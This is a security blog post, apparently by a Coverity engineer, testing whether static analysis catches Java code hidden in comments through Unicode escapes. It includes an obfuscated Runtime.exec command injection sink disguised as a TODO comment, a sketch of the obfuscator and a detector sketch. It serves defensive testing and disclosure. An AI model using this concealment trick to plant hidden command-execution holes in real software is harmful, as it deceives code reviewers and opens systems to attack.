Unicode Escaping: Is Coverity Affected?

Posted by Jon

Java Unicode Escaping Background

The Java 8 Language Specification (JLS) Section 3.3 defines the following:

A compiler for the Java programming language ("Java compiler") first recognizes Unicode escapes in its input, translating the ASCII characters \u followed by four hexadecimal digits to the UTF-16 code unit (§3.1) for the indicated hexadecimal value, and passing all other characters unchanged. Representing supplementary characters requires two consecutive Unicode escapes. This translation step results in a sequence of Unicode input characters.

This means someone can embed an escaped Unicode character in Java source code that will be unescaped when it's compiled. Searching Stack Overflow highlights the confusion that can arise from Unicode escaped values in Java source code.
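To make the translation step concrete, here is a minimal sketch of it in Java. It is an illustration of the rule quoted above, not the code any real compiler uses: the class and method names are made up for this example, and unlike a compiler it passes malformed escapes through instead of rejecting them. It does honor two details from JLS 3.3: an escape may contain more than one `u`, and a backslash only starts an escape when it is preceded by an even number of backslashes.

```java
final class UnicodeEscapeTranslator {

    // Hypothetical helper: rewrites backslash-u escapes into the UTF-16 code
    // units they name, before any tokenizing would happen.
    static String translate(String src) {
        StringBuilder out = new StringBuilder();
        int precedingBackslashes = 0; // contiguous backslashes just before index i
        int i = 0;
        while (i < src.length()) {
            char c = src.charAt(i);
            if (c == '\\' && precedingBackslashes % 2 == 0) {
                int j = i + 1;
                while (j < src.length() && src.charAt(j) == 'u') {
                    j++; // one or more 'u' characters are allowed
                }
                if (j > i + 1 && hasFourHexDigits(src, j)) {
                    out.append((char) Integer.parseInt(src.substring(j, j + 4), 16));
                    i = j + 4;
                    precedingBackslashes = 0;
                    continue;
                }
            }
            precedingBackslashes = (c == '\\') ? precedingBackslashes + 1 : 0;
            out.append(c);
            i++;
        }
        return out.toString();
    }

    private static boolean hasFourHexDigits(String s, int start) {
        if (start + 4 > s.length()) {
            return false;
        }
        for (int k = start; k < start + 4; k++) {
            if (Character.digit(s.charAt(k), 16) < 0) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        // The doubled backslashes keep javac from translating these escapes itself.
        System.out.println(translate("/* hidden \\u002a\\u002f int x = 1; /* */"));
    }
}
```

Running `main` prints `/* hidden */ int x = 1; /* */`: the escaped characters close the comment early, so the text after them becomes live code.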

From a security standpoint, a developer could potentially hide malicious code using this technique. Jeff Williams's Black Hat 2009 presentation on "Enterprise Java Rootkits" described exactly this (see the "Abusing Code Formatting" section), in addition to other attacks. Go read that presentation; it's good!

What's Old is New

Mathias Bynens recently posted a comment regarding Java Unicode escaping, re-discovering what Jeff discussed. This was picked up by Peter Jaric, who created the Java Obfuscator - Lite microsite so people can obfuscate their code. The site had the following:

When you're programming you may sometimes feel that you need to hide some code from a coworker or a static code analysis tool.

Working at Coverity, I saw that statement as throwing down the gauntlet :) Curious, I wanted to see how Coverity's static analysis would deal with Unicode escapes. Coverity uses the Edison Design Group's (EDG) Java front end. Since we're not using Oracle's compiler, there is a small chance that EDG's front end handles Unicode escapes differently and misses the hidden code.

Test

I structured the test so any Coverity user could play along at home.

Create the Test Application

I'll use the Struts 2 starter archetype:

mvn archetype:generate -B -DgroupId=com.example \
                          -DartifactId=obfuscation-test \
                          -DarchetypeGroupId=org.apache.struts \
                          -DarchetypeArtifactId=struts2-archetype-starter \
                          -DarchetypeVersion=2.3.20 \
                          -DremoteRepositories=http://struts.apache.org

This created a directory called obfuscation-test for me.

Add a Sink

I'll add an OS command injection sink to the application, using Java's Runtime.exec method. Struts 2 uses getter / setter syntax on entry points to pass in user-controlled data. (Read up here for a primer on Struts 2 conventions.)

Here's the evil line prior to obfuscation:

Runtime.getRuntime().exec(name);

Running that through Peter's tool gives the following:

/* TODO: fix this stuff \u002a\u002f\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u006e\u0061\u006d\u0065\u0029\u003b\u002f\u002a */
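For readers wondering how a line like that comes about, the sketch below shows one way to produce it. This is a guess at the approach, not Peter's actual code, and the class and method names are hypothetical. The trick is to escape a comment terminator, the payload, and a new comment opener, so that the whole line looks like a single block comment until the compiler translates the escapes.

```java
final class CommentEscapeObfuscator {

    // Hypothetical helper: writes every character of the input as a
    // backslash-u escape with four lowercase hex digits.
    static String escapeAll(String text) {
        StringBuilder sb = new StringBuilder();
        for (char c : text.toCharArray()) {
            sb.append(String.format("\\u%04x", (int) c));
        }
        return sb.toString();
    }

    // Builds a line that reads as one block comment. The escaped text starts
    // by closing the decoy comment and ends by opening a second one, so the
    // payload sits between two real comments after translation.
    static String hideInComment(String decoy, String payload) {
        return "/* " + decoy + " " + escapeAll("*/" + payload + "/*") + " */";
    }

    public static void main(String[] args) {
        System.out.println(
            hideInComment("TODO: fix this stuff", "Runtime.getRuntime().exec(name);"));
    }
}
```

After the compiler's translation step, the generated line is equivalent to `/* TODO: fix this stuff */Runtime.getRuntime().exec(name);/* */`, which is why the call runs even though an editor shows only a comment.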

Now, just add that line to the src/main/java/com/example/HelloWorldAction.java file:

    public String execute() throws Exception {

        /* TODO: fix this stuff \u002a\u002f\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u006e\u0061\u006d\u0065\u0029\u003b\u002f\u002a */
        return SUCCESS;
    }
}

Compile

Now to compile!

mvn clean package -Dmaven.test.skip=true

...

[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 1.688s
[INFO] Finished at: Fri Apr 24 11:14:56 PDT 2015
[INFO] Final Memory: 15M/302M
[INFO] ------------------------------------------------------------------------

OK, so that looks good. Now let's invoke the whole Coverity tool chain.

Coverity Analysis

I'll try to keep things brief here. Coverity captures the Java compilation by wrapping the build using a utility called cov-build. It stores what it captures into an intermediate directory. So I'll invoke that. I also have to invoke another command called cov-emit-java that stuffs the Java web application archive into the intermediate directory. Then, I'll run the actual analysis using cov-analyze, disabling all of the other checkers and only enabling the checker responsible for OS command injection, aptly named "OS_CMD_INJECTION".

  • cov-build:
$COV_BIN/cov-build --dir $IDIR mvn package -Dmaven.test.skip=true

Coverity Build Capture (64-bit) version 7.6.1.s2 on Linux 3.2.0-41-generic x86_64
Internal version numbers: 56023db682 p-jwasharmony-push-21098.188


[INFO] Scanning for projects...
...

[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time: 23.197s
[INFO] Finished at: Fri Apr 24 11:20:07 PDT 2015
[INFO] Final Memory: 15M/302M
[INFO] ------------------------------------------------------------------------
3 Java compilation units (100%) have been captured and are ready for analysis
The cov-build utility completed successfully.
  • cov-emit-java:
$COV_BIN/cov-emit-java --dir $IDIR --war ./target/struts2-archetype-starter.war
Coverity Java Emit version 7.6.1.s2 on Linux 3.2.0-41-generic x86_64
Internal version numbers: 56023db682 p-jwasharmony-push-21098.188

Processing webapp archive: /home/jpasski/src/obfuscation-test/target/struts2-archetype-starter.war
[STATUS] Compiling 4 JSP files
|0----------25-----------50----------75---------100|
****************************************************
4 out of 4 JSPs (100%) have been processed successfully. See details in /store/idirs/test-obfuscation/jsp-compilation-log.txt
Done; cov-emit-java took 22s
  • cov-analyze:
$COV_BIN/cov-analyze --dir $IDIR --java --disable-default -en OS_CMD_INJECTION
Coverity Static Analysis version 7.6.1.s2 on Linux 3.2.0-41-generic x86_64
Internal version numbers: 56023db682 p-jwasharmony-push-21098.188

Using 8 workers as limited by CPU(s)
...
****************************************************
[STATUS] Starting analysis run
|0----------25-----------50----------75---------100|
****************************************************
Analysis summary report:
------------------------
Files analyzed                 : 7
Total LoC input to cov-analyze : 170
Functions analyzed             : 659
Paths analyzed                 : 6497
Time taken by analysis         : 00:00:50
Defect occurrences found       : 1 OS_CMD_INJECTION

Looks like we found something! Let's commit the result to our web UI, called "Coverity Connect", and view it there.

While our display of the defect could be a bit better, we still find the issue. So at least in the case of Unicode escaping, Coverity's static analysis still finds the defect. Whoop!

Closing Thoughts

If your developers are now your adversaries, you've picked very challenging adversaries! If you're an existing customer, and you think we should report on the use of Unicode escaping, especially when it looks suspicious like the above, we're interested in hearing from you.
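As a rough idea of what "reporting on suspicious Unicode escaping" could look like, here is a small sketch. It is not a Coverity checker and does not reflect how Coverity works internally; the class name and the heuristic are assumptions made for illustration. The heuristic: printable ASCII characters never need to be escaped in Java source, so an escape that decodes to one is worth a second look. For brevity it ignores the even-backslash rule from JLS 3.3, so it can produce false positives inside string literals.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class SuspiciousEscapeScanner {

    // Matches a backslash, one or more 'u', and four hex digits.
    private static final Pattern ESCAPE = Pattern.compile("\\\\u+([0-9a-fA-F]{4})");

    // Returns the 1-based numbers of lines that contain an escape which
    // decodes to a printable ASCII character.
    static List<Integer> suspiciousLines(String source) {
        List<Integer> hits = new ArrayList<>();
        String[] lines = source.split("\n", -1);
        for (int n = 0; n < lines.length; n++) {
            Matcher m = ESCAPE.matcher(lines[n]);
            while (m.find()) {
                int codeUnit = Integer.parseInt(m.group(1), 16);
                if (codeUnit >= 0x20 && codeUnit < 0x7f) {
                    hits.add(n + 1);
                    break; // one report per line is enough
                }
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        String source = String.join("\n",
            "String copyright = \"\\u00a9 Example\";",
            "/* TODO \\u002a\\u002f doSomething(); \\u002f\\u002a */");
        System.out.println(suspiciousLines(source));
    }
}
```

With the two sample lines in `main`, only the second is reported: the copyright sign is a legitimate use of an escape, while the escaped `*` and `/` are not.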
